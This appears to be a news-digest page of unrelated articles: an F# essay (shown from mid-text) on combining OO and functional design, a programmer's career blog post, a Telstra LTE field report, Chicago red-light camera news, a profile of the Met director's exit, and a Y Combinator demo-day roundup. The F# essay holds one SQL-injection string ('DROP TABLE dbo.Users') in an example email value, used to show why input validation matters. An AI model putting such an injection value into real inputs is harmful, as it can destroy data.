The most important aspect of this approach is readability. It is easier for a consumer of this interface to anticipate what the purpose of each argument is, in the same way that it is easier to understand a record of functions over a tuple of functions.

Representing Illegal State

A lot of proverbial ink has been spent describing how we should strive to make illegal states unrepresentable. However, I do fail to see how this could be fully realized given that the functional core of F# only consists of algebraic data types. Take for example an oft-quoted email type:

type Email = Email of string

The following values are valid instances of type Email:

Email null
Email "John Smith"
Email "eirik@foo.bar'; DROP TABLE dbo.Users"

If we truly care about illegal states, the obvious alteration to the type above ought to be the following

type Email = private | Email of string
with
    member this.Address = let (Email addr) = this in addr
    static member TryParse(address : string) =
        if isValidEmail address then Some(Email address)
        else None

But really, this is just a class encoded by a union. The implementation below is simpler:

type Email private (address : string) =
    member __.Address = address
    static member TryParse(address : string) =
        if isValidEmail address then Some(Email address)
        else None

NB the previous implementation might in fact be warranted in cases where free structural equality or comparison are needed. But for all intents and purposes, both approaches effectively subscribe to OO-style encapsulation.

OO And Purity

The relationship between OO and purity can be a frequent avenue for misconception. Occasionally someone will claim that by admitting objects we are ipso facto forsaking purity. On the contrary, I do claim that these really are orthogonal concerns. Just as a lambda is capable of producing side-effects, objects can be designed for purity. Good examples of this are Map and Set in the core library. The lambda is really just an abstract class with a single virtual method and lots of syntactic sugar. There is nothing fundamentally setting it apart from objects once you exclude the syntactic aspect.

Conclusions

So, is this a call to go full-blown OO in F# projects? Should we be digging up our old GoF copies? Are design patterns up there in the functional curriculum together with profunctor optics? Are inheritance and class hierarchies sexy again? No!

I am in fact proposing that there is a third way, where functional and OO components coexist, with one paradigm complementing the other. This is hardly a new idea. Quoting from the F# design guidelines:

F# is commonly called a functional-first language: object, functional and imperative paradigms are all well supported, but functional programming tends to be the first technique used. Many of the defaults of F# are set up to encourage functional programming, but programming in the other paradigms is effective and efficient, and a combination is often best of all. It is a common misconception that the functional and object programming methodologies are competing. In fact, they are generally orthogonal and largely complementary. Often, functional programming plays a stronger role “in the small” (e.g. at the implementation level of functions/methods and the code contained therein) and object programming plays a bigger role “in the large” (e.g. at the structural level of classes, interfaces, and namespaces, and the organization of APIs for frameworks).

In my 6 years of working with F#, my style has gradually shifted towards embracing this approach. A few examples:

  • I typically write the implementation of a large component in the functional style behind a private module, then expose its public API as part of a standalone class. I find that method-based APIs are friendlier to consumers unfamiliar with the implementation.
  • I use records and unions for encoding internal representations and classes for encapsulating publicly visible instances. A very good example of this is the F# map implementation.
  • I rarely expose records and unions as part of a public API unless it is abundantly evident that all possible instances for the given types are valid in their context of use. This does not happen often in my experience.
  • If a module is exposed as part of a public API, care must be taken so that the number of arguments is small and behaviour can be predicted by reading the type signature of the function alone. The core List and Array modules are a good example. Avoid using modules to expose complex functionality like the Async API.

I remember reading a few years back Simon Cousins’ NOOO manifesto, which stands for Not Only Object-Oriented development. In retrospect I find this to be an excellent name for a manifesto, if only because “Not Only OO” is not the same thing as “No OO”. So here’s a proposal to revive that manifesto, perhaps with the understanding that “Not Only OO” also implies “Not Only FP” in the context of F#.

Close this section

Yes I Still Want to Be Doing This at 56 (2012)

Yes I Still Want To Be Doing This at 56

Oct 4, 2012

Do You Really Want To Be Doing This at 50?

"But large scale, high stress coding? I may have to admit that's a young man's game."

No, it's a stupid person's game (sure it's mostly men, but not 100%). I'm 55 and have been coding professionally since 1981 and started in school in 1973 or so. One thing I've learned for sure is that coding yourself to death is not worth it in the end.

My recent post Why I Don't Do Unpaid Overtime and Neither Should You remains my most popular post every week since it appeared. Seems I am not the only one who has figured out that deathcoding is a waste of life. I won't repeat what I said there.

To the question of still doing this at 55, in my case, the answer is yes. I still enjoy the challenges, managing complex problems and finding good solutions. Every morning I read a number of websites devoted to technology and programming to see what is new. I figure the day I don't care about new things is the day I give up being a programmer. My morning ritual has not changed since I started my first programming job, except in those days it was magazines, catalogs and books plus the occasional conference.

I remember a job I had at that first company (General Dynamics) where I was trained to support the new IBM PC's we were getting. This wasn't my only task but it was something new so no one knew what might be needed so I read everything I could get my hands on including the entire body of IBM's product literature. Soon the IBM reps were coming to me to find out how to configure and combine various products together. I didn't have to learn all this stuff but it seemed a useful body of knowledge. Today I still learn stuff because it is interesting even if the need seems unlikely.

If you aren't curious about the world of programming and other related technology areas then your programming career isn't going to last. Most of the people I knew who got Computer Science degrees when I was in college no longer program anything; they lost interest, or stopped learning and eventually got run over by the new technology steamroller. My degree (and a half) was in Chemistry of all things.

Through the years I've morphed so many times I may as well be in a Wolfman movie (which was my nickname in high school).

The thing I find most important today is that you should never work longer, just smarter. Being older does mean you can't code 20 hours a day anymore; or rather, you can only imagine you can, because it's not really good coding. Is there a real limit to how many hours a day you can actually be producing a quality application? It probably does go down over time, but as long as you continue to learn how to code smarter the end result is still quality, just with less caffeine.

The biggest difference between today and when I started is the sheer variety of choices of languages, tools, platforms, methodologies and in general options that one can choose from (or have chosen for you). It's impossible for anyone to know everything anymore, even about a narrow area like I was able to do with my IBM PC knowledge. What matters more is the ability to choose wisely among the many options. One of my favorite movie lines is from Indiana Jones and the Last Crusade, where the bad guy melts down and the old knight says "He chose poorly". So much glittery stuff to pick from, but only some of it is actually usable.

Having experience sometimes gives you the upper hand in knowing when to go and when to slow. Then again being young lets you look at something new and not worry about failure. There is benefit to both points of view, I think of the young Steve Jobs who had all the right ideas but couldn't make them work and the older Steve Jobs who could take the ideas and make them amazing. The point is not that either age is by itself a benefit but that you keep some of the curiosity and vision of youth and combine it with experience and a longer viewpoint when being older so you never become obsolete.

If you still want to be a programmer at 55, you can't ever lose the hunger to know more, know better and know simpler. Once you lose that edge, the technology steamroller keeps coming closer and closer until you wind up flat, doing something else for a living.

I never considered when I was 24 and in my first professional programming job what being 55 was going to be like, but I already knew what I had to do to keep relevant and always a step ahead.

Will programming still exist in 31 more years? A good question. Will I still be programming at 86? Probably not but if it's still possible and I still care, maybe. By then I should be so smart I can do a whole day's work in 30 minutes.

Either that or I will tell my robot friend to do it for me and get back to my nap!

Close this section

Telstra’s Gigabit Class LTE Network

We just came back from Sydney, Australia where we had the opportunity to experience the world’s first Gigabit Class LTE network operated by Telstra, using the world’s first commercially available Gigabit Class LTE device, Netgear® Nighthawk M1 powered by Qualcomm Snapdragon™ X16 LTE modem. As we are still in the process of analyzing the collected data, this brief overview should offer our initial impressions.

The vast majority of outdoor tests were conducted on March 14th & 15th and included visits to iconic locations throughout Sydney’s Central Business District (CBD). On March 16th stormy weather limited our mobility and kept us in the hotel, but we used that time to experience Nighthawk M1’s 4-way receive antenna design performance in cell edge environment.

Our goal was to quantify the performance delta of a Category (Cat) 16 device (Nighthawk M1) against a Cat 6 device (Telstra Signature Premium by HTC) in a Gigabit Class LTE network, by performing everyday tasks such as downloading and uploading (large) files to Google Drive, streaming YouTube 4K videos, and using a popular Ookla SpeedTest. For maximum performance, our preferred testing method involved a laptop tethered via USB, which means most of our testing has been done stationary. Additionally, we performed a healthy amount of low mobility testing using smartphones wirelessly tethered to the M1. Over three days of testing we have burned through 180GB of data.

Telstra’s state of the art FDD LTE network currently runs on four LTE channels, three being 20MHz wide (two contiguous 2600MHz Band 7, one 700MHz Band 28), and an additional 15MHz wide (1800MHz Band 3). That’s a massive 150MHz of dedicated and deployed LTE spectrum on what seems a tightly spaced cell grid, ensuring one-of-a-kind end user experience throughout the CBD. To put that into perspective, in the NYC market Verizon is dedicating a total of 90MHz of deployed LTE capacity on a macro grid originally spaced for CDMA 850MHz, although Verizon’s recent densification efforts have been admirable. Additionally, the estimated population of Sydney is roughly half of NYC’s, with population density 28 times lower than NYC’s. And with all that deployed LTE capacity, Telstra still has more than enough spectrum to operate two DC-HSPA+ layers (2100MHz Band 1 and 850MHz Band 5), and an additional Single Channel HSPA+. If that’s not enough capacity for you, an additional 900MHz Band 8 spectrum is readily available for refarming after the recent GSM network shutdown.

All Telstra’s multi-sector macro sites in Sydney’s CBD have been provisioned with 10Gbps fiber backhaul links, and unlike many operators around the globe, and especially here in the U.S., Telstra has chosen to obtain the “full-speed” baseband licensing agreements at the eNodeB level, taking any potential artificial throttle imposed by the infrastructure vendor out of the picture. For many operators this type of decision typically boils down to economics, but maintaining a global leadership position without sacrificing the highest possible quality of user experience happened to be the driving factor behind Telstra’s decision, and we salute them.

Just over a month ago, Telstra started early trials of Evolved Multimedia Broadcast Multicast Service (eMBMS) throughout the market, currently allocating about 10% of spectrum resources in Band 28 for point-to-multipoint video broadcast. eMBMS is a feature defined in Release 8/9, and unlike unicast, it enables content (video, software updates, weather, news) delivery to an unlimited number of users at the same time, all sharing the same pre-allocated set of network resource blocks. In this case, the eMBMS feature reduces the downlink data rates on Band 28 by 10%, but it can be dynamically managed. eMBMS is a highly efficient way of distributing popular content to meet clustered demand, typically in large stadiums and arenas.

Ericsson is supplying the latest hardware and software (17A), and over the past 12 months Telstra and Ericsson have been hard at work upgrading cell sites with four-branch transmit and receive equipment needed for 4×4 MIMO operation on LTE Bands 3 and 7. Another unique feature rolled out throughout the market is Ericsson Lean Carrier (ELC). ELC is Ericsson’s own advanced solution, taking a page straight out of the 5G NR study item, with the purpose of reducing inter-cell signaling interference and improving the utilization of advanced modulation techniques such as 256QAM. ELC is designed to suppress chatty signaling coming from neighboring sites during the quiet times (late night) when there is no user data transmission, which reduces interference, allows for more efficient spectrum utilization and ultimately higher data rates on active user terminals.

Netgear Nighthawk M1 is the first commercially available Category 16 LTE device, powered by Qualcomm Snapdragon X16 discrete LTE modem, and WTR5975 RF transceiver. The same Cat 16 modem is integrated into the Qualcomm Snapdragon 835 platform, and is expected to power many popular high end smartphones later this year. Qualcomm Snapdragon X16 LTE modem supports up to 4-Channel Carrier Aggregation,  Downlink 256QAM, and Nighthawk M1 LTE mobile router includes 4-way receive diversity (4RxD) antenna design for mid and high LTE bands, enabling 4×4 MIMO operation up to Rank 4, and allowing for peak download speeds of up to 1Gbps. Uplink 64QAM on all supported bands, and Uplink Carrier Aggregation (UL-CA) on two contiguous Band 7 component carriers is also supported, allowing for upload speeds of up to 150Mbps (Cat 13). Nighthawk M1 has USB Type-A and Type-C ports, Ethernet port, supports 802.11ac on both 2.4GHz and 5GHz, up to 80MHz wide channels. M1 users can configure the router using internal configuration page, or using a sleek mobile app developed by Netgear, which offers a more granular access to router settings, such as Radio Access Technology (RAT) preference and basic LTE Band locking feature.

Telstra has also supplied a Category 6 device (HTC’s Telstra Signature Premium) capable of aggregating two downlink component carriers with peak speeds of up to 300Mbps.


The network performance has been nothing short of stellar. In Circular Quay, one of the busiest tourist locations, we’ve achieved sustained downlink data rates of over 400Mbps, peaking at over 550Mbps. — Cellular Insights

Upload speeds were exceptional, leveraging UL-64QAM, and Uplink Carrier Aggregation (UL-CA) on two contiguous Band 7 component carriers, peaking at 113Mbps. Reaching these high upload speeds required locking the device to Band 7 Only, which limits the downlink performance to 2-Channel Carrier Aggregation, but enables the UL-CA. We are sure that higher data rates would’ve been possible had we tested during the quiet times.

During the peak hours at the same location, Telstra’s LTE network had no issues delivering sustained data rates of over 200Mbps, and uplink of over 80Mbps.

YouTube 4K videos would stream immediately and smoothly, and uploading 1GB file to Google Drive at 14MBps took just a little over a minute.

  • Combining results from all outdoor locations, Cat 16 device achieved speeds of 30Mbps for 85% of the time, vs 57% of the time on a Cat 6 device;
  • During the indoor testing at RSRP value of -100dBm or lower, Cat 16 device achieved speeds of 10Mbps for 89% of the time vs 37% of the time on the Cat 6 device;


Telstra’s LTE network isn’t a lab test or a limited demonstration of a Gigabit Class LTE capability. This is a fully functional, fully optimized, living and breathing commercial Gigabit Class LTE network, delivering an unmatched LTE performance in multiple markets, setting the bar almost impossibly high for all other operators around the world. We are extremely impressed with this first hand experience, and surely hope to pay another visit in the future, with field testing equipment by our side.


Close this section

Red-light camera grace period goes from 0.1 to 0.3 seconds, Chicago to lose $17M

In the wake of recommendations that were part of a recent study of its red-light cameras, the Chicago Department of Transportation has agreed to immediately increase the so-called “grace period”—the time between when a traffic light turns red to when a ticket is automatically issued.

Under the new policy, which was announced Monday, the grace period for Chicago’s red lights will move from 0.1 seconds to 0.3 seconds. This will bring the Windy City in line with other American metropolises, including New York City and Philadelphia. In a statement, the city agency said that this increase would “maintain the safety benefits of the program while ensuring the program’s fairness.”

On Tuesday, the Chicago Tribune reported that the city would lose $17 million in revenue this year alone as a result of the expanded grace period. Michael Claffey, a CDOT spokesman, confirmed that figure to Ars.

“We want to emphasize that extending this enforcement threshold is not an invitation to drivers to try to beat the red light,” CDOT Commissioner Rebekah Scheinfeld also said in the statement. “By accepting the recommendation of the academic team, we are giving the benefit of the doubt to well-intentioned drivers while remaining focused on the most reckless behaviors.”

According to the study, which was conducted by Northwestern University Transportation Center and funded by the city, Chicago has the largest installation of red-light cameras anywhere nationwide, with 306 cameras at 151 intersections. Until 2012, the network of cameras was operated by Redflex; however, an investigation by the Tribune found that the company’s interactions with Chicago officials were actually corrupt. The mayor booted Redflex out and gave the contract to Xerox instead—three federal prosecutions connected to Redflex quickly followed.

Close this section

Inside a Met Director's Exit

On February 4, The New York Times published an article by Robin Pogrebin that asked the startling question “Is the Met Museum ‘a Great Institution in Decline’?” In the piece Pogrebin quoted George Goldner, a longtime curator in the Met’s drawings and prints department, who had retired in 2015. “It’s a tragedy to see a great institution in decline,” Goldner told Pogrebin. “To have inherited a museum as strong as the Met was 10 years ago—with a great curatorial staff—and to have it be what it is today is unimaginable.” (Goldner now serves as an art adviser to billionaire buyout mogul Leon Black, whose wife is on the Met board.)

The article was “like an atomic bomb in the room,” says one former administrator at the Met. “You have to think hard to think of a public cultural institution that’s been denounced on the front page of The New York Times. I can’t remember that.”

Three weeks later Thomas Campbell, the director of the museum, resigned under pressure, effective June 30, a move that stunned the insular art world. The turn of events caught even Campbell by surprise, according to the former administrator. How did things go so wrong for this 54-year-old onetime wunderkind, who had come up through the ranks in the Met’s tiny tapestry department before succeeding Philippe de Montebello, the museum’s longtime aristocratic director, in 2009? How did things go wrong for the Met?

Founded in 1870, the Metropolitan Museum of Art is the largest art museum in America. It is arguably the world’s most important museum, with its encyclopedic collection representing the cultural and artistic history of mankind. Spanning four city blocks on Fifth Avenue and jutting into Central Park, the museum’s main building sprawls over two million square feet. Its neoclassical central façade, designed in 1895 by Richard Morris Hunt, is framed by gigantic columns atop a grand staircase, on which there always seems to be a busy, energetic crowd buzzing about. Inside, the sweeping collections of sculptures and paintings, weapons and armor, musical instruments, costumes, fashion art, and more—over two million artworks, total—are tended by curators and scholars in 17 different departments.

During its most recent fiscal year, the Met had 6.7 million visitors—the fifth consecutive year the museum had attracted more than 6 million people. It has an endowment of $2.5 billion—bigger than most colleges and universities. Revenue was roughly $390 million. In 2015, Moody’s awarded the Met’s $250 million bond issue to support “infrastructure improvements” its highest Aaa rating, and even though the museum’s total outstanding debt was $393 million, the ratings agency fairly gushed about the museum’s “exemplary brand recognition,” and its “excellent prospects” for continued “strong donor support.”

The Met’s trustees come from New York City’s wealthiest elites. According to the former administrator, the trustees have a combined net worth in excess of $500 billion. The Met board is the ultimate Establishment perch and status symbol. Over the years it has included such luminaries as Secretary of the Treasury Douglas Dillon, investment bankers André Meyer and Robert Lehman, TV Guide publisher Walter Annenberg, and Lazard Frères chairman Michel David-Weill. Today the board is populated by the current generation of New York society, including Annette de la Renta and Wall Street bigwigs John Paulson, Tony James, Tom Hill, Blair Effron, and Russell Carson. Daniel Brodsky, a real-estate developer, has been the board’s chairman since 2011.

The Met’s Great Hall.

By Benjamin Norman/The New York Times/Redux.

At first, Campbell’s fellow curators celebrated his ascension to the directorship. They were pleased that one of their own had again been selected to lead the tradition-bound institution. (De Montebello had served as an associate curator in the Department of European Paintings.) A graduate of Oxford, Campbell was described by The New Yorker as “irredeemably English.” Before joining the Met, in 1996, he worked for seven years for David and Simon Franses, renowned London tapestry dealers, where he became an expert in European tapestries. His nickname at the Met was “Tapestry Tom.”

The former Met administrator explains that while Campbell wasn’t one of the establishment curators, he also wasn’t a complete outsider. “He seemed like a good fit for the Met at the time. He was young and charming” and was seen “as an extremely good curator” and “a very bright guy who had his own ideas and was an independent actor.” The hope was that Campbell would satisfy the wishes of the increasing number of newer, younger trustees to modernize certain aspects of the museum—for instance, by making it seem less intimidating and more inviting to young people, by digitizing its massive collection, and by initiating a push into the collection and display of contemporary art—while also respecting the museum’s historic emphasis on scholarship and comprehensiveness.

“Tom would make people his anointed ones,” says a board member. “Then … ‘Oops, you’re no longer my anointed one.’ ”

But given Campbell’s narrow focus, in hindsight the obvious question is why, when he was being considered for the top job, the Met’s board didn’t delve more deeply into whether he had the necessary management skills and temperament to lead an “encyclopedic” museum with 2,500 employees.

“The feeling was that given the fact that the museum was in good shape and that Philippe had done a good job, given the strong leadership of the board, it was felt that Tom was just the right person because culture is so important at the Met,” explains a board member. “There are 17 curatorial departments. Each of them has its own priorities. It’s almost as if the director has 17 children. Some are bigger than others. Some are more demanding than others.”

Campbell’s first major test came in the aftermath of the 2008 financial crisis. As the stock market swooned, so did the value of the Met’s endowment, which shrank by a third. Donations plummeted, along with gate receipts. But the consensus seemed to be that Campbell acquitted himself honorably during this difficult period. “Overall, he handled that very well, especially as a beginner,” says the former administrator. “He came out of it looking like somebody who could manage a big institution.”

As the economy started to slowly recover, Campbell began to implement his strategic vision for the Met. “Then somehow things started to go awry,” says the former administrator. Campbell wanted to make the Met “new and trendy,” this person continues, and he started appointing people “who were more that way.” Indeed, under Campbell, 14 of the 17 heads of curatorial departments at the museum were either replaced or retired. “It tells you both that the director wants to turn over the applecart and also that there’s a certain dissatisfaction,” the former administrator adds. One widely panned misstep involved Campbell’s decision to redesign the Met’s simple logo—the capital letter M encased in an intricate design based on a woodcut by Luca Pacioli, a collaborator of Leonardo da Vinci’s—that had been a fixture since the 1970s. It was perhaps a small matter, but a highly visible one, and traditionalists thought the new, two-word scarlet logo, created by branding firm Wolff Olins—“The Met”—resembled a “red double-decker bus that has stopped short, shoving the passengers into each other’s backs,” according to New York magazine’s architecture critic.

Campbell also ordered up the redesign of the Met’s Web site, another move unlikely to please everyone, and it didn’t. Some of the curators complained that the site was being used mainly for “razzmatazz—fancy graphics and blogs, as opposed to putting the collection on it,” says the former administrator.

In a move that also upset many curators, Campbell directed considerable resources toward the new, “digital” department, according to the administrator—there were as many as 75 people working in it at an annual cost of around $20 million—dedicated to such projects as making it easier for visitors to use their mobile devices around the museum and beginning the arduous process of digitizing the museum’s collection of two million artworks. “There were more people working in the digital department than there were in any five or six other departments combined,” says the former administrator. “That was another big expenditure, and it tied together with this ever growing sense that the Met was going to be young and cool,” he says. “I think that it just got out of proportion.”

A view of Central Park; the Met is at bottom right.

© Herb Ling/aerialarchives.com.

Then there was the series of unfortunate events that began, in April 2013, with Leonard Lauder’s extraordinary gift of his unmatched collection of 78 Cubist paintings, drawings, and sculptures, among them 33 Picassos, 17 Braques, and 14 Légers—valued at more than $1 billion. “In one fell swoop this puts the Met at the forefront of early-20th-century art,” Campbell said at the time. “It is an un-reproducible collection, something museum directors only dream about.”

Leonard Lauder, along with his brother, Ronald, are the heirs to the Estée Lauder cosmetics fortune and also two of the city’s most important and philanthropic art collectors. “The idea was that [the Cubist artworks] would be shown together in the Leonard Lauder research-center area of the new contemporary wing,” says a Met source, “and that it be supported, intellectually and in a research way, by a center that would endow a particular [collection], built around a particular curator that Leonard liked very much by the name of Becca Rabinow. The interesting question is: did Lauder donate the art outright, or did he donate it predicated on the establishment of a center?” (Lauder denies there was any quid pro quo.)

According to the former administrator, Lauder got the better of Campbell over the terms and conditions of the donation. “If you put Leonard Lauder and Tom Campbell in the room in a negotiation, I don’t think Tom Campbell would emerge victorious,” this person says.

“The board voted to support the [new wing],” says a source, “but they didn’t vote with their wallets—just their pencils.”

In exchange for his gift, says the Met source, Lauder wanted the Met to delve more deeply into modern and contemporary art, a view shared by Campbell and a number of board members. According to The New York Times, Lauder “quietly masterminded” the Met’s takeover of the landmarked former Whitney Museum building, designed by the Hungarian brutalist architect Marcel Breuer. (In separate statements, Lauder said the Met’s use of the Breuer building “was in no way a condition of my gift,” and the Met said that plans for the project and for use of the Breuer building were finalized in 2011, “well before Mr. Lauder committed to making his gift.”) The Met agreed to lease the building for eight years—at a cost of $17 million per year—and to house its growing modern and contemporary collection there on an interim basis. The museum spent another estimated $13 million to renovate the Breuer building.

Previously, the Met had embarked on a $600 million project to demolish the existing Lila Acheson Wallace Wing, on Fifth Avenue, and to build a new wing, in the southwest corner of the museum’s footprint, which would double the size of the Roof Garden and house modern and contemporary art. In 2015, after a year-long study, the Met chose David Chipperfield Architects to design the new building, which was to be completed in 2020 to coincide with the museum’s 150th anniversary.

Some observers think the Met made a mistake in agreeing to build the new wing, to house Lauder’s Cubist collection. As a matter of principle, says Robert Storr, a professor at the Yale School of Art and a former senior curator at the Museum of Modern Art, “it’s one thing to accept such a collection. It’s another thing to accept that you’re going to have to increase the space of exhibition, given such treasures. . . . What makes a vital collection over long periods of time is not to have chapels to particular art, much less particular collections.”

What proved more problematic in the end was Campbell’s decision to initiate the project before he had secured the $600 million to fund it, and the cash was slow in coming. The board seemed reluctant to support the project financially. According to the former administrator, only the two Blackstone partners, Tony James and Tom Hill, stepped up, pledging $10 million each—but that still left the project far short of where it needed to be. (A Blackstone spokeswoman confirmed only that the two had made major cash donations to fund the Met Breuer.) In January the museum made the humiliating announcement that it was indefinitely postponing the new wing. (Shortly before he resigned, Campbell was said to be negotiating two $150 million gifts for the undertaking.) Sources say both Leonard Lauder and Steve Schwarzman, a co-founder of Blackstone, were asked for major gifts, although neither man is on the Met’s board. (Lauder would not respond to a request for comment. The Blackstone spokeswoman confirmed that Schwarzman had been approached for a large gift and declined.) “I think there is a certain amount of hypocrisy,” explains the former administrator. “The board voted to support the project, but they didn’t vote with their wallets—they just voted with their pencils. But when it comes down to writing checks, nobody is writing checks.”

Another important factor that caused the board to lose confidence in Campbell was the staff’s widespread dissatisfaction with his management style. “He would latch onto people and make them his anointed ones,” says one board member. “Then after a period of time, ‘Oops, you’re no longer my anointed one.’ ” The board member says this happened with Carrie Rebora Barratt, whom Campbell named associate director of collections and administration the year he took charge. Barratt went from being “the anointed one” to being out of favor with Campbell. “Then he changed his mind again, which was ‘Oh, she’s not as bad as I thought she was.’ As a leader you have to be consistent in your vision. You have to be consistent in execution. You have to be consistent with your team members.”

The board member adds, “Tom was on a mission and was not as sensitive to a lot of the interpersonal dynamics. Also, Tom was not a particularly good listener. You could have a meeting with him, and he always came in with his points, but usually when you have a meeting there’s a two-way equation. It goes back and forth. What I would say is that there were any number of meetings that I had with Tom, and I witnessed, where he was a participant in the meetings and he was—I don’t want to say tone-deaf, because that overstates it—but he wasn’t as sensitive to what was going on in the room as he might have been.” (A Met spokesman replies that, on the contrary, Campbell has promoted and appointed department heads with strong voices.)

Another problem was Campbell’s friskiness with certain women on the staff. He had been warned about it early in his tenure but still carried on. More recently a legal action was brought against him and the Met, but it was settled.

The former administrator says Campbell’s behavior was especially problematic because women make up three-quarters of the Met’s administrators. “A lot of them took umbrage at this,” this person says. “Inevitably this leads to the sort of grumbling where women who were not promoted or women who don’t advance for whatever reason are going to think it’s because they’re not the right type, they’re not his kind of girl—that sort of thing.”

Outgoing Met director Thomas Campbell and Leonard Lauder at the museum, photographed by Annie Leibovitz in 2013.

From Trunk Archive; For artwork details, go to VF.com/Credits.

In the end, what seems to have done Campbell in was the board’s increasing impatience with the state of the Met’s finances, despite its enviable endowment and credit rating. In recent years, the annual deficit had ranged between $4 million and $8 million, a relatively modest sum given the size of the endowment. The former administrator says that even under de Montebello the museum’s finances were always a bit of a “fast and loose” shell game, designed to show small losses. “They never wanted a large deficit, because it would look bad, and they never wanted a surplus, because they were afraid the donors wouldn’t give them money,” the person says. (The board’s chairman, Brodsky, replies that “the Met’s finances are managed responsibly. They are subject to internal and external audits and are published publicly in the annual report.” De Montebello could not be reached for comment.)

But that began to change for the worse under Campbell, especially after the Met’s payments on the Breuer kicked in, plus another $8.5 million in interest payments on the new bonds. Under Campbell, says the former administrator, “the budgetary looseness—which had always existed in principle—just went berserk.”

In order to save money, in April 2016 the Met announced a two-year “financial restructuring” plan, including staff cuts, hiring freezes, buyouts, and reduced programming. “We’ve had increasing pressure on the budget and knew that we were going to have to take actions to get it back in balance,” Campbell said at the time. In July, the Met announced that at least 100 employees, out of a workforce of 2,300, would be cut from the museum’s staff in an effort to reduce its $10 million deficit. At the time, Met president Dan Weiss said that without the cuts the Met’s shortfall would balloon to $40 million. In the end, only 34 non-curatorial employees were let go. Of the 159 employees eligible for a buyout—those who were more than 55 years old and had been at the Met for at least 15 years—56 took the offer, according to The New York Times. Staff members were even told they had to use a less expensive kind of pencil, according to the former administrator, who says, “Everything that wasn’t nailed down was being cut back or gotten rid of. I can tell you it was all anybody talked about. It was all the administration focused on for months and months and months.”

Morale plummeted. “I think it got to a point where the curators [disagreed with] some of the cost cuts, some of the decisions that were being made, some of the trade-offs and choices around where we were going to spend money at the Met,” the board member says.

The Met Breuer, formerly the Whitney Museum of American Art, in N.Y.C.

By Terese Loeb Kreuzer/Alamy.

One lingering question is how the board, made up of a Who’s Who of financial Masters of the Universe, could have let things get to the point of staff layoffs and hiring freezes. Some cite the genial nature of Henry Schacht, a partner at Warburg Pincus and, at the time, the head of the Met’s finance committee. “Henry is to my mind one of the nicer people one could meet,” says the former administrator, “but he didn’t want to rock any boats. He’s a very sweet guy. He’s a gentleman. He was a great believer that the director runs the museum and we have to support him…. Everything was O.K. when Philippe was there because Philippe knew enough to make sure everything came out O.K. in the end, and they developed this habit of just, O.K., Philippe can deal with it. But the problem was Tom couldn’t deal with it and he had these extravagant plans that Philippe didn’t have.” (Schacht declined comment. Tony James, Blackstone’s president and C.O.O., has since replaced him as finance-committee chairman.)

The day after Campbell resigned, The Art Newspaper published an interview with the former Met curator George Goldner, in which he elaborated on the observations he had made to The New York Times about the Met’s problems. Ironically, he had once been an enthusiastic supporter of Campbell’s, but his opinion of his onetime colleague had since soured. “It is unfortunate that the people who have been made to suffer are the staff,” he said. “A lot of people have been pushed out, some of whom were very good. Benefits have been reduced. Curatorial travel has been cut back. There is more pressure to limit the size of catalogues and exhibitions. I think they did a disservice to the institution because it’s impossible for Tom to improve morale in that kind of atmosphere. It is unconscionable that the pension of a person making $60,000 a year is cut through no fault of his or her own, whereas senior board members, who must in part take responsibility, have borne no part of the blame or burden.”

He said that, while he was no lover of contemporary art, he understood why Campbell bet the Met’s future on it, even if it proved to be his undoing. “I acknowledge there is no escaping it,” he said in the interview with The Art Newspaper. “Still, how can one explain spending $600 [million] to renovate the Modern and contemporary art wing? When the Met did the renovation of the Islamic galleries [in 2011], the total bill was much less—$50 [million]—and it was done beautifully. We are competing hard in the one field where we can’t possibly be the best in New York [because of the extensive modern-art collections at both the Museum of Modern Art and the Whitney]. Having a big center of modern art at the Met is like having a center of Italian paintings 20 blocks away from the Uffizi. Part of what has created the morale issue is that other departments have felt that their concerns have been relegated to a secondary position behind contemporary art and digital media.”

The former administrator says there are several morals to the story. One, this person says, is that “experience does matter.” He believes that the problems in Campbell’s personality came out only after he had become director, and that “if he had had a job as chief curator or a job as director of a museum before, one would have seen those things.”

Under de Montebello, a very strong leader, the museum had run like a well-oiled machine, but Campbell needed a stronger team under him to make up for his inexperience and to support his ambitious program to modernize the museum. The Met board member says, “I feel sorry for Tom Campbell, because not only did he walk into a whole bunch of buzz saws; he just didn’t have the experience to deal with a lot of key issues.”

“It’s not a very complicated story,” says a source close to the Met. “Tom was a curator. He was plucked out to run a big job—not just director but director and C.E.O. He forged an agenda with the board. He had some management issues. They together made all these decisions to get ahead on digital. Tom wasn’t on his own. They together decided to invest in modern and contemporary. The place is politically, totally insane. Along the way, whatever is going on among the board members about who’s up and who’s down, Tom obviously lost enough support there and he obviously lost curatorial support—the curators run the whole culture. And because he wasn’t a good manager, they urged him to leave and he resigned and that’s the story.”

Photos: A Glimpse at Icons of Modern Art: The Shchukin Collection

Portrait of Dr. Félix Rey, by Vincent van Gogh, 1889. From The Pushkin State Museum of Fine Arts, Moscow.

Woman with a Fan, by Pablo Picasso, 1908. From The State Hermitage Museum, St. Petersburg/© Succession Picasso.

Woman with Rake, by Kazimir Malevich, circa 1932. From The State Tretyakov Gallery, Moscow.

Nude, Black and Gold, by Henri Matisse, 1908. From The State Hermitage Museum, St. Petersburg/© Succession H. Matisse.

Close this section

Startups that debuted at Y Combinator W17 Demo Day 2

Over 15,000 founders from 7,200 startups applied to this batch of Y Combinator. It chose just over 100 with founders from 22 countries to go through its accelerator program. Today, the second half of those companies launched on stage, and we have breakdowns of all 51 of these businesses.

Oh, and the ACLU. The 97-year-old legal activism non-profit is far from a startup, but went through YC to learn more growth tactics.

Today’s set of companies focused on hardcore backend engineering tools and scrappy social apps. And thanks to YC’s recently developed Investor Match system, it’s able to route the startups and VCs most interested in each other into meetings.

Yesterday we covered the first 52 startups from this YC batch and shared our top 7 picks for the most promising companies. Later we’ll have our top picks from day 2, but for now here are our writeups of the 51 startups that presented today.

Voodoo Manufacturing – A robotic 3D printing factory

Voodoo wants to be the AWS for manufacturing. It’s building a robotic factory of 3D printers so clients can send a digital file and get a physical product in return with no molds, labor, startup cost, or minimum order size. That massively democratizes access to manufacturing, the same way AWS did for cloud computing. It’s already working with Nike, Microsoft, Verizon, and Intel, and is on track to make $330,000 this quarter at a 65% margin. Voodoo is looking to disrupt the $50 billion plastic injection molding market, and grow it by making manufacturing as flexible as spinning up servers.

Read more about Voodoo Manufacturing on TechCrunch

 

Volt Health – An electrical stimulation medical device 

Volt is an electrostimulation wearable to treat diseases like incontinence. The founder has already taken six medical devices to market, including the CoolSculpting device that sold for billions. Incontinence affects 25 million people and is a $25 billion market. The device stimulates the muscles to get them to give feedback to receptors. This helps those suffering from incontinence to not pee when they don’t want to. The device can also target other conditions like migraines and comes with proprietary technology.

 

